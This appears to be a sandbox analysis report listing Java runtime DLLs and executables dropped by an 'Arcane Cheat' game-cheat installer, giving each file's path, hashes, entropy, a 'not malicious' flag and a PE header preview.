                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):126528
                                Entropy (8bit):6.8082748642937725
                                Encrypted:false
                                SSDEEP:3072:Kw2b3Kr+uWU9XzFhziJ1TBZAhsIn/B9NZwMgjeNXLD:43KFFheLCBpV/
                                MD5:73BD0B62B158C5A8D0CE92064600620D
                                SHA1:63C74250C17F75FE6356B649C484AD5936C3E871
                                SHA-256:E7B870DEB08BC864FA7FD4DEC67CEF15896FE802FAFB3009E1B7724625D7DA30
                                SHA-512:EBA1CF977365446B35740471882C5209773A313DE653404A8D603245417D32A4E9F23E3B6CD85721143D2F9A0E46ED330C3D8BA8C24AEE390D137F9B5CD68D8F
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!..r..r..r.W.r..r.W(r..r...r..r..(r..r...r..r.W.r..r..r..r.W)r..r.W.r..r.W.r..r.W.r..rRich..r................PE..L...qPjW...........!..... ...........(.......0.....m................................6N....@......................... u...B...U..........................@............5...............................S..@............0......<U..@....................text...b........ .................. ..`.rdata.......0.......$..............@..@.data...............................@....rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LUGNS.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):185920
                                Entropy (8bit):6.517453559791758
                                Encrypted:false
                                SSDEEP:3072:pmxoFzYbnERrNyf0VCyqp2pswAG8wJfV1cnrQKUCc9rBTq/bKQcUMZ:koFJcQCyuZG8wdKcLgbDcU6
                                MD5:D4246AF96E1FFA5E63C55E6F0A63ED82
                                SHA1:30F319CEBD7BCCCFC3637231D07F45BD5A79B03E
                                SHA-256:84576AAC88D08E864645415D8A81F4B8F04C881B7624973C952BA6BCB94F4C8C
                                SHA-512:92EDFE62BE5BDDC47EC51B01F8FE71C69691423ABECBB358A972766ACCDC8F9365C064FD0A7833C8853EDD5DED51791A7662584DB5F54BE3586AC2787160FA6A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......AE.m.$z>.$z>.$z>.\.>.$z>...>.$z>...>.$z>...>.$z>.${>T$z>...>"$z>...>.$z>...>.$z>...>.$z>Rich.$z>........................PE..L...pPjW...........!.................%.......0.....o......................................@..........................P..h...LK..d.......................@.......$... 1...............................I..@............0...............................text............................... ..`.rdata..H#...0...$... ..............@..@.data....h...`...\...D..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M0CO5.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):13888
                                Entropy (8bit):6.274978807671468
                                Encrypted:false
                                SSDEEP:192:ahKnvndLwm3XLPVlD6yTUZnYe+PjPriT0fwdNJLkoRz:a4j7PVl1TAnYPLr7cLka
                                MD5:0291BA5765EE11F36C0040B1F6E821FB
                                SHA1:FFE1DCF575CCD0374DF005E9B01D89F6D7095833
                                SHA-256:F8540BE2BBD5BDE7962D2FE4E7EC9EF9BF53D95B48781AE549AA792F10032485
                                SHA-512:72ADDC631D8CF064E1B047B51EEF7F306CA959D24ED705065C33EE8DDDF7EA84B95B3DE5B0709015A81D36ACA01E15CE99A354D4069D4D798ED128A6A76D1010
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X"._9LR_9LR_9LRD..R^9LRD..RS9LRD..RZ9LRVA.R]9LR_9MR|9LRD..R\9LRD..R^9LRD..R^9LRD..R^9LRRich_9LR........PE..L...xPjW...........!......................... .....m.........................`............@..........................&..J...\"..P....@..................@....P..@.... ...............................!..@............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc..t....P......................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M6OGV.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.141852308272967
                                Encrypted:false
                                SSDEEP:192:7pQMhM63XLPVT6MsMPapRuBUEp7nYe+PjPriT0fwtK:7muL7PV4aapRuBTp7nYPLr7J
                                MD5:D63933F4E279A140CC2A941CCFF38348
                                SHA1:75169BE2E9BCFE20674D72D43CA6E2BC4A5A9382
                                SHA-256:532D049E0D7A265754902C23B0F150D665A78A3D6FE09AD51C9BE8C29D574A3D
                                SHA-512:D7A5023A5EB9B0C3B2AD6F55696A166F07FA60F9D1A12D186B23AAAACC92EF948CB5DFFA013AFC90C4BBE3DE077D591185902384F677D0BAE2FF7CFD5DB5E06C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.Z.[.Z.[.Z.[.A<..[.[.A<..Q.[.A<.._.[.S...X.[.Z.Z.D.[.A<..Y.[.A<..[.[.A<..[.[.A<..[.[.RichZ.[.................PE..L...yPjW...........!......................... .....m.........................`......em....@.........................`%......,"..P....@..x............"..@....P.. .... ............................... ..@............ ...............................text............................... ..`.rdata..d.... ......................@..@.data...`....0......................@....rsrc...x....@......................@..@.reloc..^....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M8DR9.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):455328
                                Entropy (8bit):6.698367093574994
                                Encrypted:false
                                SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                MD5:FD5CABBE52272BD76007B68186EBAF00
                                SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MH2RS.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):158784
                                Entropy (8bit):6.816453355323999
                                Encrypted:false
                                SSDEEP:3072:gLkNbBRaz4rQWiG6wMz9/S3en9pHUw06TBfkqI44:rNbB4Mcnv7z6en9pj06TB6
                                MD5:73A76EC257BD5574D9DB43DF2A3BB27F
                                SHA1:2C9248EAE2F9F5F610F6A1DFD799B0598DA00368
                                SHA-256:8F19B1BA9295F87E701C46CB888222BB7E79C6EE74B09237D3313E174AE0154F
                                SHA-512:59ECD5FCF35745BDADCDB94456CB51BB7EA305647C164FE73D42E87F226528D1A53CE732F5EC64CE5B4581FA8A17CFBFDC8173E103AE862D6E92EB3AD3638518
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................6...........0.....=............7....5.....4.....3....Rich............PE..L....PjW...........!...............................o................................Y.....@..........................3..m....*..d....................T..@............................................#..@............................................text...~........................... ..`.rdata...u.......v..................@..@.data....4...@......."..............@....rsrc................6..............@..@.reloc.."............:..............@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MITQ2.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):95808
                                Entropy (8bit):6.48897048228647
                                Encrypted:false
                                SSDEEP:1536:EHSB4i2hJwZaDEoDVzkhbyJCAqn9nV+1vkJnHBoY8BK5Hj:EJJwZWEoDVYby81yiBovkHj
                                MD5:E5A6231FE1E6FEC5F547DFD845D209BC
                                SHA1:3F21F90ECC377B6099637D5B59593D2415450D45
                                SHA-256:51355EA8A7DC238483C8069361776103779CE9FE3CD0267770E321E6E4368366
                                SHA-512:D5D20DF0089F3217B627D39ABD57C61E026D0DC537022FB698F85FA6893C7FA348C40295DEEC78506F0EF608827D39E2F6F3538818BA25E2A0EE1145FCC95940
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./zR/k.<|k.<|k.<|p..|{.<|p..|2.<|bc.|n.<|k.=|7.<|p..|O.<|p..|j.<|p..|j.<|p..|j.<|Richk.<|........................PE..L...qPjW...........!................!o.............p......................................@.........................p7..>...<0..<.......x............^..@...........................................(+..@...............@............................text...<........................... ..`.rdata...e.......f..................@..@.data...`,...P.......0..............@....rsrc...x............>..............@..@.reloc..J............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-ML2GN.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):151104
                                Entropy (8bit):6.548096027649263
                                Encrypted:false
                                SSDEEP:3072:PPuiQNBInyjJ2y53/5d8n9e/ry7zOAHpyWWJd1u2TeKSNlGFGZQfVN2:iBInu2y5P5dkeDy7zOUpLJ2mHZQf2
                                MD5:7A710F90A74981C2F060FA361D094822
                                SHA1:FBDCA4E3F19AD5201572974E3C772A3C2694FBB3
                                SHA-256:9BC52058C02E0C87A6A9470C62D1AA4F998942CC00F99A82E7805E87D958BC16
                                SHA-512:928708DFF6A372BA997C072238823469CBFD28CCBB17A723AD35F851D35C6EFF82748AA41A9215955B9536A14AA57D47ABE0F1BA00D11F8D920A57F91B7A35E5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5......7.....................&.......8.......#.....5.........................4......3.....6.....Rich....................PE..L...oPjW...........!................g..............m.........................p............@.........................0...P............@...............6..@....P..........................................@...............4............................text............................... ..`.rdata...g.......h..................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MV7G1.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):473152
                                Entropy (8bit):5.475991416072106
                                Encrypted:false
                                SSDEEP:6144:ngmgmb+p19k+j4QJKFDSha+IJ6NyLu/wtAWvrMZp5WMuBzj:n17bsj4QJlha+XNyLu/iAWvhBzj
                                MD5:79CFE207E05F771E29847573593F6DE1
                                SHA1:34DFA813802C6F5A57A557BF72B2B306F8042E90
                                SHA-256:AEB27727F428116069944BB92B477D7487C9DEB3921E1005814536459E35222F
                                SHA-512:2C71A827BB156BD012BE20B30D701D5123D8B6C7889D4F4A47A483D3477C25BF224E7F205CA9FCCB08DA0A2EF28AF6433D018A0E555BCE911C31A5F462F41578
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.....@..@..@..4@..@.u2@..@.u.@..@../@..@..?@..@..@:.@k..@..@.u.@\.@.u7@..@.u6@..@.u1@..@Rich..@........PE..L...pPjW...........!.....^..........r .......p.....o.........................p............@.........................@D.......+...........s........... ..@.... ..H6...t..................................@............p.......).......................text...\\.......^.................. ..`.rdata.......p.......b..............@..@.data....I...P...*...8..............@....rsrc....s.......t...b..............@..@.reloc...H... ...J..................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-NE044.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):514112
                                Entropy (8bit):6.805344203686025
                                Encrypted:false
                                SSDEEP:12288:Y5JbfdT5NYGe8m51QSWvopH1kdMDbA2ZoNnYX:Y5JV7eB3KopvnAe2YX
                                MD5:8D0CE7151635322F1FE71A8CEA22A7D6
                                SHA1:81E526D3BD968A57AF430ABB5F55A5C55166E579
                                SHA-256:43C2AC74004F307117D80EE44D6D94DB2205C802AE6F57764810DEE17CFC914D
                                SHA-512:3C78C0249B06A798106FEAF796AA61D3A849F379BD438BF0BB7BFED0DC9B7E7EA7DE689BC3874ED8B97FF2B3BA40265DED251896E03643B696EFDBF2E01AC88C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Es.J$..J$..J$....N$..Gv..I$..Gv.G$..Gv..G$..Gv..H$..7]..%$.....B$..7]..H$..J$...%..7]..K$..Gv.K$..7].K$..RichJ$..........PE..L...pPjW...........!................g..............m......................................@..........................F.......I..........................@.......lT...................................E..@............................................text............................... ..`.rdata..............................@..@.data....0...`..."...D..............@....rsrc................f..............@..@.reloc..lT.......V...j..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O1CKK.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):400960
                                Entropy (8bit):6.165546757090391
                                Encrypted:false
                                SSDEEP:6144:vxDvEpBGH7t7PB7Es7va/QdqOBYswIprNWhk+URpxfu4w7J:tvEpBGH7pN57vwQd6swIp5WhkRlfu4CJ
                                MD5:767BBA46789597B120D01E48A685811E
                                SHA1:D2052953DDE6002D590D0D89C2A052195364410A
                                SHA-256:218D349986E2A0CD4A76F665434F455A8D452F1B27EAF9D01A120CB35DA13694
                                SHA-512:86F7F7E87514DBC62C284083D66D5F250A24FC5CD7540AF573C3FB9D47B802BE5FFBBC709B638F8E066AB6E4BB396320F6E65A8016415366799C74772398B530
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j..'..{t..{t..{t.g.t).{t#..t-.{t#..t".{t#..t".{t#..t,.{tS..ty.{t.8.t".{t..zt..{tS..t/.{t#..t/.{tS..t/.{tRich..{t................PE..L...oPjW...........!.....V...........=.......p.....m.........................P............@.............................^...............................@.... ..h'......................................@............p...............................text....T.......V.................. ..`.rdata...j...p...l...Z..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..h'... ...(..................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O5MSC.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):17472
                                Entropy (8bit):6.403594687791098
                                Encrypted:false
                                SSDEEP:192:A3PK394shTLHzW8KMw3X+PVR6y/FNdoEUtnYe+PjPriT0fwoBpp6Z:BThTrzPPQOPV5NNdoEwnYPLr7xc
                                MD5:94CAADA66F6316A9415A025C68388A18
                                SHA1:57544E446B2B0CFBA0732F1F46522354F94B7908
                                SHA-256:D1C4FB91296D643AEE6AB9CD66CC70ACBE2667AD572D969A06FFEAA2A8859FAF
                                SHA-512:AC29E7C722A266DCB633953EF2A7E33DF02059AC7876FF94828464B5B74B5BC321C5D2D2851F3CBBFE1328D18F3CD9A49E5EFFE7E4E8AC2BEB3A0E4AAA53AD87
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w....@..w..O9K..w....O..w...w...w....M..w....x..w....y..w....H..w....I..w....N..w..Rich.w..........PE..L...qPjW...........!................)........0.....o.........................p......w.....@..........................7.._....3..<....P...............,..@....`.......0...............................2..@............0...............................text...>........................... ..`.rdata..O....0......................@..@.data...X....@......."..............@....rsrc........P.......$..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OMDGH.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477211573452372
                                Encrypted:false
                                SSDEEP:384:Gps25Bnb61mSHhV8nOeet4SzvBQnYPLr7D8/:Gpson1S/8nTetJSC7+
                                MD5:ED3F3D8E4C382BF8095B9DE217511E29
                                SHA1:CAE91B9228C99DCC88BAC3293822AC158430778C
                                SHA-256:800F41B877AA792A8469C4DBB99838E7A833B586EC41BD81DA81EAA571F7FAC1
                                SHA-512:023855267C6CC6BD5230E7A922310328E8DC0521C041C038C579035C9B1E70EAC168695B56357793505375E0B134FAD040BB284C6B02B3190EE7F6FCAEC33FE9
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`...........@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OV1CO.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):145984
                                Entropy (8bit):6.69725055196282
                                Encrypted:false
                                SSDEEP:3072:S2yRKm4/j/dKLnjHy7OMD+MqS1RYio7+oD33GnUV0fem2M:S2ytqlYnjHehDzqiq+oD33OUV8Vx
                                MD5:4294D39CC9E5F23754D41B9DDE710112
                                SHA1:1BAA1E136F18108AB4E31EC005DEC54FC3F23A7C
                                SHA-256:DE3EEDED01B35DC7C29B0B758211BB1DB73CCFFB9298D281DAF56924ED9E93CB
                                SHA-512:E88DFF129DD35445B32A2DBCAB97CF752E9ACDF82FF88B184FA6D3B461D55BD2D195794802C5BA5E7EFFA086DC89E0C2CEF0C8B0BFA29AC70B75CFB1B4B0584C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........:.j.i.j.i.j.i..5i.j.i..8i.j.i...i.j.i..:i.j.i.j.i.j.i...i.j.i..=i.j.i..<i.j.i..;i.j.iRich.j.i................PE..L....PjW...........!.........P......)..............o.........................`............@.........................."..X.......P....@..............."..@....P..........................................@............................................text...N........................... ..`.rdata...9.......:..................@..@.data........0......................@....rsrc........@......................@..@.reloc..4....P......................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-P9144.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477747126356611
                                Encrypted:false
                                SSDEEP:384:GpsJ5cn66FmSHhV8Teeek4SzSgnYPLr7mpB:GpsUngS/8TDekdC7yB
                                MD5:CA17B8CBD623477C5D1D334B79890225
                                SHA1:2BFC372A28EDE40093286CDA45003951A2CE424F
                                SHA-256:A7AC47AC8518E2D53575E12521B3A766A5E2EE4133C6C6AB9AE1C3C6777F5E77
                                SHA-512:D9DDF3E67B9A4E0197D271243623D4DF8A26A35EC2F5195AB316E910E133BA09C70F6D28E7CA69184E4ABABCF063C014D7A6E6EA48F82382B316864A945175C5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`....... ....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-PFI2B.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.490137326885244
                                Encrypted:false
                                SSDEEP:384:WCMJqfiSZzDonPV5TyVIbb8nYPLr7VblXT:WLJqrNkndQIsC7Vhj
                                MD5:1F004C428E01F8BEB07B52EB9659A661
                                SHA1:4D6AAB306CB1F4925890BF69FCDF32BBFE942B81
                                SHA-256:1BDEFECDF8CFA3F6DA606AD4D8BD98EC81E4A244D459A141723CCB9DC47E57CB
                                SHA-512:61888A778394950D2840E4D211196FFE1CB18FA45D092CBADBEDF2809BDED3D4421330CFE95392DD098E4AE3F6F8A3070E273FFCA2FB495C43C76332CA331DBF
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.x^w.x^w.x^...^v.x^l..^u.x^l..^u.x^l..^u.x^~..^r.x^w.y^[.x^l..^y.x^l..^v.x^l..^v.x^l..^v.x^Richw.x^........PE..L...oPjW...........!.........................0.....m.........................p.......!....@..........................7.......2..P....P...............(..@....`..`....0..............................`1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......&..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-QS1JT.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):773968
                                Entropy (8bit):6.901569696995594
                                Encrypted:false
                                SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                MD5:BF38660A9125935658CFA3E53FDC7D65
                                SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RBKCS.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.4779230305378315
                                Encrypted:false
                                SSDEEP:384:Gpsk5Bn46zmSHhV8yYAeeU4Sz5uwnYPLr73ki:GpsungS/8yY1eUuwC79
                                MD5:E9AA62B1696145A08D223E7190785E25
                                SHA1:A9A0CB22A28A3843CF6CCBC9578B1438F0A7B500
                                SHA-256:EA9DF3432EF31B6864112AF1CEC94E6BE33B92A9030369B9F99225113BCA6EF8
                                SHA-512:516FA102922980DF592DD08A840DA9073B6568F5E52847968C59995F2BD067AC6D2668D0272AE017D0C71AF627766A8676AE1EB1BC520B76F1F9C5CEEB4BA840
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......#....@.................................D#..P....@..T............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...T....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RJ8O6.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):115264
                                Entropy (8bit):6.588792190592223
                                Encrypted:false
                                SSDEEP:3072:2Cgsy+/cydqNiaZr+lOzZPh7/W4MCnc8Ioaa2yFWcC6vsx/8:FZOzZPh7/WSe+S6v+U
                                MD5:8BC8FE64128F6D79863BC059D9CC0E2E
                                SHA1:C1F2018F656D5500ACF8FA5C970E51A55004DA2E
                                SHA-256:B77CD78FF90361E7F654983856EE9697FDC68A0F9081C06207B691B0C9AF1F5D
                                SHA-512:6771F23ECF1A449EB6B0B394E0F1D3EB17C973FC0544BA25487C92F215ACC234FC31C9B7BE5528EFD06D29A35BB37DD7934318837576862ADFC2631B4D610A24
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l..>7..l..>...l..>5..l..>...l...#..l..5..l..l.zl.....l.....l..4..l..>3..l..6..l.Rich.l.........PE..L...}PjW...........!.........|......],.......@.....m................................~.....@.....................................x.......................@............................................h..@............@...............................text....-.......................... ..`.rdata..4Z...@...\...2..............@..@.data...4...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RKJ6P.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):163904
                                Entropy (8bit):6.508553433039132
                                Encrypted:false
                                SSDEEP:3072:onzJtwzsrYx6cY+90AiVrM5muIqltkt7maRoM/X1fJqO0NJT:onttwzsrYxTaVVY5muIq3mx/X1fcb
                                MD5:A63387A1BFDF760575B04B7BFD57FF89
                                SHA1:9384247599523D97F40B973A00EE536848B1D76F
                                SHA-256:5DF5B7E6EFCC345DDC8448AFC707B666F5F696F554B00ACA64D8E23EDBC176BF
                                SHA-512:CB3A6A394424345FFA076E0BE58F284A0E4DB6FBFCE02D93FB4871D350A7FA1E673175AE988C26453DB1C983C0D06A01DD413DE47031BB4BF308CAAF3513C36F
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...T.^.T.^.T.^..)^.T.^../^.T.^...^&T.^.".^.T.^.,2^.T.^.,"^.T.^.T.^MT.^...^.T.^..*^.T.^..+^.T.^..,^.T.^Rich.T.^................PE..L...rPjW...........!...............................p......................................@.................................D........p..P............h..@.......d...................................P...@.......................@....................text............................... ..`.rdata...d.......f..................@..@.data...`@... ..."..................@....rsrc...P....p.......(..............@..@.reloc..~/.......0...8..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RMB9M.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):159296
                                Entropy (8bit):6.019927381236816
                                Encrypted:false
                                SSDEEP:3072:9vFy5zbJEQFFB9AYeb11tzTQrTBfYEaf9zQ6NlUlh5:7iFry3b11twTBgEaf9zQ6Nc
                                MD5:C15F0FE651B05F4288CBC3672F6DC3CE
                                SHA1:FFCE84FE532B41F31CDDC41C84024FAFE6BC30E6
                                SHA-256:869DC4D40444F10325057B0CC3BB7EA48942DD712DF8A1AE331A554FF0397F1A
                                SHA-512:E9E27C4C68972E3250B380C1A5D5EB02BEC03028D389234A44A7D56974BFA233D177173F929BDB6FF877AE17A529D85D384684B0037E260A0143F7A95A0204C6
                                Malicious:false
